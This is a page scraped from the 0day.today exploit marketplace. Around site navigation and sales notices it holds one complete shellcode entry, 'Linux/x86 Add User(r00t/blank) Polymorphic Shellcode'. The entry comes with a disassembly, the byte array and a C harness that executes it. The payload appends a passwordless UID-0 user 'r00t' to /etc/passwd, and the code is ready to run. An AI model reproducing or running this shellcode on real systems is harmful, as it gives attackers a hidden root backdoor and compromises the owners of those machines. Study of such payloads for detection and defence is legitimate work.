0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linux/x86 - Add User(r00t/blank) Polymorphic Shellcode (103 bytes)
[/*
# Shellcode Title: Linux/x86 - Add User(r00t/blank) Polymorphic Shellcode (103 bytes)
# Date: 2018-09-13
# Author: Ray Doyle (@doylersec)
# Homepage: https://www.doyler.net
# Tested on: Linux/x86
# gcc -o poly_adduser_shellcode -z execstack -fno-stack-protector poly_adduser_shellcode.c
*/
/****************************************************
Disassembly of section .text:
08048060 <_start>:
8048060: 90 nop
8048061: 58 pop eax
8048062: 29 db sub ebx,ebx
8048064: 31 c9 xor ecx,ecx
8048066: 66 b9 01 04 mov cx,0x401
804806a: 51 push ecx
804806b: 5f pop edi
804806c: 53 push ebx
804806d: 6a 06 push 0x6
804806f: 58 pop eax
8048070: 48 dec eax
8048071: 68 2f 2f 70 61 push 0x61702f2f
8048076: 68 37 13 37 13 push 0x13371337
804807b: 68 73 73 77 64 push 0x64777373
8048080: 68 2f 65 74 63 push 0x6374652f
8048085: 5a pop edx
8048086: 5e pop esi
8048087: 5f pop edi
8048088: 5f pop edi
8048089: 56 push esi
804808a: 57 push edi
804808b: 52 push edx
804808c: 89 e3 mov ebx,esp
804808e: cd 80 int 0x80
8048090: 50 push eax
8048091: 5a pop edx
8048092: 92 xchg edx,eax
8048093: 89 c3 mov ebx,eax
8048095: 6a 05 push 0x5
8048097: 31 d2 xor edx,edx
8048099: 87 db xchg ebx,ebx
804809b: 6a 0c push 0xc
804809d: 58 pop eax
804809e: 5a pop edx
804809f: 92 xchg edx,eax
80480a0: 52 push edx
80480a1: 90 nop
80480a2: 68 30 3a 3a 3a push 0x3a3a3a30
80480a7: 56 push esi
80480a8: 5e pop esi
80480a9: 68 3a 3a 30 3a push 0x3a303a3a
80480ae: 68 72 30 30 74 push 0x74303072
80480b3: 48 dec eax
80480b4: 89 e1 mov ecx,esp
80480b6: 6a 01 push 0x1
80480b8: cd 80 int 0x80
80480ba: 6a 04 push 0x4
80480bc: 58 pop eax
80480bd: 83 c0 02 add eax,0x2
80480c0: cd 80 int 0x80
80480c2: 31 c0 xor eax,eax
80480c4: 40 inc eax
80480c5: cd 80 int 0x80
****************************************************/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x90\x58\x29\xdb\x31\xc9\x66\xb9\x01\x04\x51\x5f\x53\x6a\x06\x58\x48\x68\x2f\x2f\x70\x61\x68\x37\x13\x37\x13\x68\x73\x73\x77\x64\x68\x2f\x65\x74\x63\x5a\x5e\x5f\x5f\x56\x57\x52\x89\xe3\xcd\x80\x50\x5a\x92\x89\xc3\x6a\x05\x31\xd2\x87\xdb\x6a\x0c\x58\x5a\x92\x52\x90\x68\x30\x3a\x3a\x3a\x56\x5e\x68\x3a\x3a\x30\x3a\x68\x72\x30\x30\x74\x48\x89\xe1\x6a\x01\xcd\x80\x6a\x04\x58\x83\xc0\x02\xcd\x80\x31\xc0\x40\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
# 0day.today [2024-11-15] #